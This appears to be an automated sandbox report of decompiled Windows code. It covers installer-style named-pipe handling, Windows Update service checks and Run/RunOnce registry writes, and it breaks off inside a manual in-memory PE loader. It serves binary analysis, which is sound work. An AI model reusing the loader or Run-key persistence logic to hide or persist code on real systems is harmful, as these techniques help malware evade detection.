                                                                                                                                                                  				_t53 = E00433CEA( &_v8, L"\\\\.\\pipe\\%ls",  *_t50);
                                                                                                                                                                  				_t66 = _t65 + 0xc;
                                                                                                                                                                  				if(_t53 >= 0) {
                                                                                                                                                                  					_t54 = 0x8000ffff;
                                                                                                                                                                  					_t41 = 0;
                                                                                                                                                                  					while(_t41 < 0x708) {
                                                                                                                                                                  						_t21 = CreateFileW(_v8, 0xc0000000, 0, 0, 3, 0, 0);
                                                                                                                                                                  						 *(_t50 + 0x10) = _t21;
                                                                                                                                                                  						if(_t21 != 0xffffffff) {
                                                                                                                                                                  							_t54 = 0;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t64 =  <=  ? GetLastError() : _t38 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t21 = 0x800705b4;
                                                                                                                                                                  							_t54 =  ==  ? 0x800705b4 :  <=  ? GetLastError() : _t38 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							Sleep(0x64);
                                                                                                                                                                  						}
                                                                                                                                                                  						_t41 = _t41 + 1;
                                                                                                                                                                  						if(_t54 < 0) {
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t54 >= 0) {
                                                                                                                                                                  						_t8 = _t50 + 8; // 0x8
                                                                                                                                                                  						_t42 = _t8;
                                                                                                                                                                  						_t53 = E0040EB2E( *(_t50 + 0x10),  *((intOrPtr*)(_t50 + 4)), _t42);
                                                                                                                                                                  						if(_t53 >= 0) {
                                                                                                                                                                  							if(_a8 == 0) {
                                                                                                                                                                  								L19:
                                                                                                                                                                  								_t23 = OpenProcess(0x100000, 0,  *_t42);
                                                                                                                                                                  								 *(_t50 + 0xc) = _t23;
                                                                                                                                                                  								if(_t23 == 0) {
                                                                                                                                                                  									_t58 =  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									_t53 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									E004300D9(0x80004005, "pipe.cpp", 0x2a8, _t53);
                                                                                                                                                                  									_push( *_t42);
                                                                                                                                                                  									_push("Failed to open companion process with PID: %u");
                                                                                                                                                                  									goto L21;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t53 = E00433CEA( &_v8, L"\\\\.\\pipe\\%ls.Cache",  *_t50);
                                                                                                                                                                  								_t66 = _t66 + 0xc;
                                                                                                                                                                  								if(_t53 >= 0) {
                                                                                                                                                                  									_t33 = CreateFileW(_v8, 0xc0000000, 0, 0, 3, 0, 0);
                                                                                                                                                                  									 *(_t50 + 0x14) = _t33;
                                                                                                                                                                  									if(_t33 != 0xffffffff) {
                                                                                                                                                                  										_t53 = E0040EB2E(_t33,  *((intOrPtr*)(_t50 + 4)), _t42);
                                                                                                                                                                  										if(_t53 < 0) {
                                                                                                                                                                  											goto L12;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											goto L19;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t61 =  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_t21 = 0x80004005;
                                                                                                                                                                  										_t53 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_push(_t53);
                                                                                                                                                                  										_push(0x29f);
                                                                                                                                                                  										goto L10;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("Failed to allocate name of parent cache pipe.");
                                                                                                                                                                  									_push(_t53);
                                                                                                                                                                  									E00430A57();
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							L12:
                                                                                                                                                                  							_push(_v8);
                                                                                                                                                                  							_push("Failed to verify parent pipe: %ls");
                                                                                                                                                                  							goto L21;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push(_t54);
                                                                                                                                                                  						_push(0x290);
                                                                                                                                                                  						L10:
                                                                                                                                                                  						_push("pipe.cpp");
                                                                                                                                                                  						E004300D9(_t21);
                                                                                                                                                                  						_push(_v8);
                                                                                                                                                                  						_push("Failed to open parent pipe: %ls");
                                                                                                                                                                  						L21:
                                                                                                                                                                  						_push(_t53);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to allocate name of parent pipe.");
                                                                                                                                                                  					_push(_t53);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t53;
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?), ref: 0040EFCE
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040EFDC
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0040F000
                                                                                                                                                                  Strings
                                                                                                                                                                  • \\.\pipe\%ls, xrefs: 0040EF86
                                                                                                                                                                  • Failed to verify parent pipe: %ls, xrefs: 0040F048
                                                                                                                                                                  • Failed to open parent pipe: %ls, xrefs: 0040F026
                                                                                                                                                                  • Failed to allocate name of parent pipe., xrefs: 0040EF9A
                                                                                                                                                                  • \\.\pipe\%ls.Cache, xrefs: 0040F061
                                                                                                                                                                  • Failed to open companion process with PID: %u, xrefs: 0040F128
                                                                                                                                                                  • Failed to allocate name of parent cache pipe., xrefs: 0040F075
                                                                                                                                                                  • pipe.cpp, xrefs: 0040F019, 0040F11C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorFileLastSleep
                                                                                                                                                                  • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                                                                  • API String ID: 408151869-645222887
                                                                                                                                                                  • Opcode ID: d775928b9ab7820fb30aafb4168cde3eaf908023b3eebb30eb3a1ae8688aa586
                                                                                                                                                                  • Instruction ID: 91c5317463a7b4fc172767754755c73bf098209d5483b4a4032623304f3b3292
                                                                                                                                                                  • Opcode Fuzzy Hash: d775928b9ab7820fb30aafb4168cde3eaf908023b3eebb30eb3a1ae8688aa586
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C412632940321BBEB316AB19D06B6AB6A4EF04721F210237FD00FA1D1D77D9D109ADC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                  			E0041D8E0(void** _a4, intOrPtr* _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				struct _SERVICE_STATUS _v36;
                                                                                                                                                                  				char _v40;
                                                                                                                                                                  				void** _v44;
                                                                                                                                                                  				void* _v48;
                                                                                                                                                                  				intOrPtr* _v52;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t21;
                                                                                                                                                                  				void* _t27;
                                                                                                                                                                  				void* _t32;
                                                                                                                                                                  				signed short _t44;
                                                                                                                                                                  				signed short _t47;
                                                                                                                                                                  				signed short _t50;
                                                                                                                                                                  				void* _t54;
                                                                                                                                                                  				signed int _t55;
                                                                                                                                                                  				void* _t64;
                                                                                                                                                                  				short* _t65;
                                                                                                                                                                  				signed int _t75;
                                                                                                                                                                  
                                                                                                                                                                  				_t21 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t21 ^ _t75;
                                                                                                                                                                  				_t55 = 7;
                                                                                                                                                                  				_v44 = _a4;
                                                                                                                                                                  				_v52 = _a8;
                                                                                                                                                                  				_t65 = 0;
                                                                                                                                                                  				memset( &_v36, 0, _t55 << 2);
                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                  				_t27 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                                                                                                  				_v48 = _t27;
                                                                                                                                                                  				if(_t27 != 0) {
                                                                                                                                                                  					_t54 = OpenServiceW(_t27, L"wuauserv", 7);
                                                                                                                                                                  					if(_t54 != 0) {
                                                                                                                                                                  						if(QueryServiceStatus(_t54,  &_v36) != 0) {
                                                                                                                                                                  							if(_v32 == 4) {
                                                                                                                                                                  								L14:
                                                                                                                                                                  								 *_v44 = _t54;
                                                                                                                                                                  								_t54 = 0;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t65 = E00438466(0, _t54,  &_v40);
                                                                                                                                                                  								if(_t65 >= 0) {
                                                                                                                                                                  									if( *((intOrPtr*)(_v40 + 4)) != 4) {
                                                                                                                                                                  										goto L14;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t65 = E0041DA76(_t54, 3);
                                                                                                                                                                  										if(_t65 >= 0) {
                                                                                                                                                                  											 *_v52 = 1;
                                                                                                                                                                  											goto L14;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_push("Failed to mark WU service to start on demand.");
                                                                                                                                                                  											goto L12;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("Failed to read configuration for WU service.");
                                                                                                                                                                  									goto L12;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t44 = GetLastError();
                                                                                                                                                                  							_t68 =  <=  ? _t44 : _t44 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t65 =  >=  ? 0x80004005 :  <=  ? _t44 : _t44 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							E004300D9(0x80004005, "msuengine.cpp", 0x19e, _t65);
                                                                                                                                                                  							_push("Failed to query status of WU service.");
                                                                                                                                                                  							goto L12;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t47 = GetLastError();
                                                                                                                                                                  						_t71 =  <=  ? _t47 : _t47 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t65 =  >=  ? 0x80004005 :  <=  ? _t47 : _t47 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "msuengine.cpp", 0x19a, _t65);
                                                                                                                                                                  						_push("Failed to open WU service.");
                                                                                                                                                                  						goto L12;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t50 = GetLastError();
                                                                                                                                                                  					_t74 =  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t65 =  >=  ? 0x80004005 :  <=  ? _t50 : _t50 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					E004300D9(0x80004005, "msuengine.cpp", 0x197, _t65);
                                                                                                                                                                  					_push("Failed to open service control manager.");
                                                                                                                                                                  					L12:
                                                                                                                                                                  					_push(_t65);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v40 != 0) {
                                                                                                                                                                  					E00431137(_v40);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t64 = CloseServiceHandle;
                                                                                                                                                                  				if(_t54 != 0) {
                                                                                                                                                                  					CloseServiceHandle(_t54);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t32 = _v48;
                                                                                                                                                                  				if(_t32 != 0) {
                                                                                                                                                                  					CloseServiceHandle(_t32);
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t65, _v8 ^ _t75, _t64, _t65);
                                                                                                                                                                  			}
























                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,?,0041DD10), ref: 0041D919
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0041DD10,?,?), ref: 0041D926
                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,wuauserv,00000007,?,?,?,?,?,?,?,?,?,0041DD10,?,?), ref: 0041D966
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0041DD10,?,?), ref: 0041D972
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0041DA57
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?), ref: 0041DA61
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Service$CloseErrorHandleLastOpen$Manager
                                                                                                                                                                  • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                                                                                                                                  • API String ID: 2257214823-301359130
                                                                                                                                                                  • Opcode ID: 45178530e8b90370da7c386abbc1f53554d34c538defd580c7abe7c6eae14238
                                                                                                                                                                  • Instruction ID: 5754b5b5cbcd91b5cffeeff879ba8639794bd8195ec2fd4fd2ee263f156d034d
                                                                                                                                                                  • Opcode Fuzzy Hash: 45178530e8b90370da7c386abbc1f53554d34c538defd580c7abe7c6eae14238
                                                                                                                                                                  • Instruction Fuzzy Hash: 484191B2F40314ABEB10DBAA9D45BEFB6F8AF08744F114127FD05F7250D6798C408AA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                  			E0040A0F6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				signed short _t35;
                                                                                                                                                                  				long _t45;
                                                                                                                                                                  				signed short _t46;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  				intOrPtr _t60;
                                                                                                                                                                  				signed short _t63;
                                                                                                                                                                  				signed short _t66;
                                                                                                                                                                  
                                                                                                                                                                  				_t53 = __ecx;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				E00436186(__ecx, __edx, __eflags,  &_v16,  &_v20);
                                                                                                                                                                  				_t58 = _a8;
                                                                                                                                                                  				_t52 =  >=  ? L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" : L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
                                                                                                                                                                  				if(_a8 == 0) {
                                                                                                                                                                  					L6:
                                                                                                                                                                  					__eflags = _a12 - 1;
                                                                                                                                                                  					if(_a12 == 1) {
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						goto L7;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t63 = E004329C8(_t58, L"Resume", _a12);
                                                                                                                                                                  					if(_t63 >= 0) {
                                                                                                                                                                  						__eflags = _a12 - 3;
                                                                                                                                                                  						if(_a12 != 3) {
                                                                                                                                                                  							goto L6;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t63 = E004329C8(_t58, L"Installed", 1);
                                                                                                                                                                  							__eflags = _t63;
                                                                                                                                                                  							if(_t63 >= 0) {
                                                                                                                                                                  								L7:
                                                                                                                                                                  								__eflags = _a16;
                                                                                                                                                                  								if(_a16 != 0) {
                                                                                                                                                                  									L13:
                                                                                                                                                                  									_t59 = _a4;
                                                                                                                                                                  									_push(L"burn.runonce");
                                                                                                                                                                  									_t35 = E00433CEA( &_v12, L"%ls /%ls",  *((intOrPtr*)(_a4 + 0x58)));
                                                                                                                                                                  									__eflags = _t35;
                                                                                                                                                                  									if(_t35 >= 0) {
                                                                                                                                                                  										_t63 = E00432129( *((intOrPtr*)(_t59 + 0x4c)), _t52, 0x20006,  &_v8);
                                                                                                                                                                  										__eflags = _t63;
                                                                                                                                                                  										if(_t63 >= 0) {
                                                                                                                                                                  											_t63 = E00432A16(_t53, _v8,  *((intOrPtr*)(_t59 + 0xc)), _v12);
                                                                                                                                                                  											__eflags = _t63;
                                                                                                                                                                  											if(_t63 < 0) {
                                                                                                                                                                  												_push("Failed to write run key value.");
                                                                                                                                                                  												goto L19;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_push("Failed to create run key.");
                                                                                                                                                                  											goto L19;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_push("Failed to format resume command line for RunOnce.");
                                                                                                                                                                  										goto L19;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t60 = _a4;
                                                                                                                                                                  									_t63 = E004324D5( *((intOrPtr*)(_t60 + 0x4c)), _t52, 0x20006,  &_v8);
                                                                                                                                                                  									__eflags = _t63 - 0x80070002;
                                                                                                                                                                  									if(_t63 == 0x80070002) {
                                                                                                                                                                  										L12:
                                                                                                                                                                  										_t63 = 0;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										__eflags = _t63 - 0x80070003;
                                                                                                                                                                  										if(_t63 == 0x80070003) {
                                                                                                                                                                  											goto L12;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t45 = RegDeleteValueW(_v8,  *(_t60 + 0xc));
                                                                                                                                                                  											__eflags = _t45 - 2;
                                                                                                                                                                  											_t46 =  ==  ? 0 : _t45;
                                                                                                                                                                  											__eflags = _t46;
                                                                                                                                                                  											if(_t46 != 0) {
                                                                                                                                                                  												__eflags = _t46;
                                                                                                                                                                  												_t66 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												__eflags = _t66;
                                                                                                                                                                  												_t63 =  >=  ? 0x80004005 : _t66;
                                                                                                                                                                  												E004300D9(0x80004005, "registration.cpp", 0x49c, _t63);
                                                                                                                                                                  												_push("Failed to delete run key value.");
                                                                                                                                                                  												goto L19;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to write Installed value.");
                                                                                                                                                                  								goto L19;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to write Resume value.");
                                                                                                                                                                  						L19:
                                                                                                                                                                  						_push(_t63);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					E004380AB(_v12);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					RegCloseKey(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t63;
                                                                                                                                                                  			}














                                                                                                                                                                  0x0040a281

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436186: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 004361D3
                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000002,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00020006,00000002,00401414,00000000,00000000,00000001), ref: 0040A1AC
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000002,?,00000001,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00020006,00000002,00000000,00000000,00000001,00000000), ref: 0040A275
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseDeleteValueVersion
                                                                                                                                                                  • String ID: %ls /%ls$Failed to create run key.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.runonce$registration.cpp
                                                                                                                                                                  • API String ID: 3279111520-3853666782
                                                                                                                                                                  • Opcode ID: ca0ef1381d18350a05bbdf74a352851e7b484bab5e77e07e019c07b1425052c7
                                                                                                                                                                  • Instruction ID: 38ab04e6d4e6819744f265b39e9affe5b73a65ce89c73ddae4fafb1396df3d89
                                                                                                                                                                  • Opcode Fuzzy Hash: ca0ef1381d18350a05bbdf74a352851e7b484bab5e77e07e019c07b1425052c7
                                                                                                                                                                  • Instruction Fuzzy Hash: 2841E332D40329FADF22AAA49D01BAE76B4AB04710F11417BFE00B6291D37D9D6096CE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E1001B680(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				signed short* _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				_Unknown_base(*)()* _v28;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				signed int _v36;
                                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                                  				char _v72;
                                                                                                                                                                  				void* _v76;
                                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                                  				intOrPtr* _v84;
                                                                                                                                                                  				intOrPtr _v88;
                                                                                                                                                                  				intOrPtr _v92;
                                                                                                                                                                  				intOrPtr _v96;
                                                                                                                                                                  				intOrPtr _v100;
                                                                                                                                                                  				void* _t170;
                                                                                                                                                                  				void* _t173;
                                                                                                                                                                  				void* _t182;
                                                                                                                                                                  				intOrPtr _t184;
                                                                                                                                                                  				void* _t194;
                                                                                                                                                                  				void* _t203;
                                                                                                                                                                  				void* _t206;
                                                                                                                                                                  				void* _t207;
                                                                                                                                                                  				void* _t209;
                                                                                                                                                                  				intOrPtr _t220;
                                                                                                                                                                  				intOrPtr _t225;
                                                                                                                                                                  				void* _t239;
                                                                                                                                                                  				intOrPtr _t311;
                                                                                                                                                                  				void* _t326;
                                                                                                                                                                  				void* _t327;
                                                                                                                                                                  				void* _t328;
                                                                                                                                                                  				void* _t329;
                                                                                                                                                                  				void* _t330;
                                                                                                                                                                  				void* _t332;
                                                                                                                                                                  				void* _t333;
                                                                                                                                                                  				void* _t334;
                                                                                                                                                                  				void* _t337;
                                                                                                                                                                  				void* _t338;
                                                                                                                                                                  				void* _t339;
                                                                                                                                                                  
                                                                                                                                                                  				_t327 = __esi;
                                                                                                                                                                  				_t326 = __edi;
                                                                                                                                                                  				_t239 = __ebx;
                                                                                                                                                                  				_v76 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
                                                                                                                                                                  				_t170 = E1001AEA0(_a8, 0x40);
                                                                                                                                                                  				_t329 = _t328 + 8;
                                                                                                                                                                  				if(_t170 != 0) {
                                                                                                                                                                  					_v16 = _a4;
                                                                                                                                                                  					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                                                  						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                                  						_t173 = E1001AEA0(_a8,  *_t9 + 0xf8);
                                                                                                                                                                  						_t330 = _t329 + 8;
                                                                                                                                                                  						if(_t173 != 0) {
                                                                                                                                                                  							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                                  							_v84 = _a4 +  *_t13;
                                                                                                                                                                  							if( *_v84 == 0x4550) {
                                                                                                                                                                  								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                                                                  									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
                                                                                                                                                                  										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                  										_v36 =  *(_v84 + 0x38);
                                                                                                                                                                  										_v12 = 0;
                                                                                                                                                                  										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
                                                                                                                                                                  											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
                                                                                                                                                                  												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
                                                                                                                                                                  											}
                                                                                                                                                                  											if(_v92 > _v20) {
                                                                                                                                                                  												_v20 = _v92;
                                                                                                                                                                  											}
                                                                                                                                                                  											_v12 = _v12 + 1;
                                                                                                                                                                  											_v88 = _v88 + 0x28;
                                                                                                                                                                  										}
                                                                                                                                                                  										_v28( &_v72);
                                                                                                                                                                  										_v32 = E1001AEE0( *((intOrPtr*)(_v84 + 0x50)), _v68);
                                                                                                                                                                  										_t182 = E1001AEE0(_v20, _v68);
                                                                                                                                                                  										_t332 = _t330 + 0x10;
                                                                                                                                                                  										if(_v32 == _t182) {
                                                                                                                                                                  											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
                                                                                                                                                                  											_t333 = _t332 + 0x14;
                                                                                                                                                                  											_v24 = _t184;
                                                                                                                                                                  											if(_v24 != 0) {
                                                                                                                                                                  												L26:
                                                                                                                                                                  												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                                                                                                                                                                  												if(_v76 != 0) {
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 4)) = _v24;
                                                                                                                                                                  													asm("sbb ecx, ecx");
                                                                                                                                                                  													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
                                                                                                                                                                  													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
                                                                                                                                                                  													_t194 = E1001AEA0(_a8,  *((intOrPtr*)(_v84 + 0x54)));
                                                                                                                                                                  													_t334 = _t333 + 8;
                                                                                                                                                                  													if(_t194 != 0) {
                                                                                                                                                                  														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
                                                                                                                                                                  														E1000D1F0(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
                                                                                                                                                                  														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                                  														 *_v76 = _v8 +  *_t121;
                                                                                                                                                                  														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
                                                                                                                                                                  														_t203 = E1001B360(_t239, _t326, _t327, _a4, _a8, _v84, _v76);
                                                                                                                                                                  														_t337 = _t334 + 0x30;
                                                                                                                                                                  														if(_t203 != 0) {
